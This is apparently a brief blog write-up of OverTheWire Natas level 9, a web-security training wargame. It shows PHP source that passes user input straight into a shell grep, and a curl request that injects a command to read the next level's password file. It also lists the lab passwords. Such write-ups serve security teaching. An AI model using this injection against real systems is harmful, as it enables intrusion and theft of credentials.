Natas [Level 9] - Overthewire

Posted Jan 22, 2023 Updated Aug 6, 2024

Natas teaches the basics of serverside web-security.

By Dat Vu 2k

1 min read

Username: natas9
Password: Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd
URL: http://natas9.natas.labs.overthewire.org

Find works containing … Let’s view the sourcecode.

curl -XGET -u natas9:Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd http://natas9.natas.labs.overthewire.org/inde
x-source.html

Look, from the way “key” is being used in the PHP script, so using characters.

  
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>

Curl POST using characters

  
curl -XPOST -u natas9:Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd -d "needle=; cat /etc/natas_webpass/natas10 ;" -d "submit="  http://natas9.natas.labs.overthewire.org

Alright, i got the password! Moving on to level 10!

==> CTF: { natas10:D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE }

CTF-AnonOps, Natas

overthewire natas

This post is licensed under CC BY 4.0 by the author.

Natas [Level 9] - Overthewire

Further Reading

Natas [Level 0] - Overthewire

Natas [Level 1] - Overthewire

Natas [Level 2] - Overthewire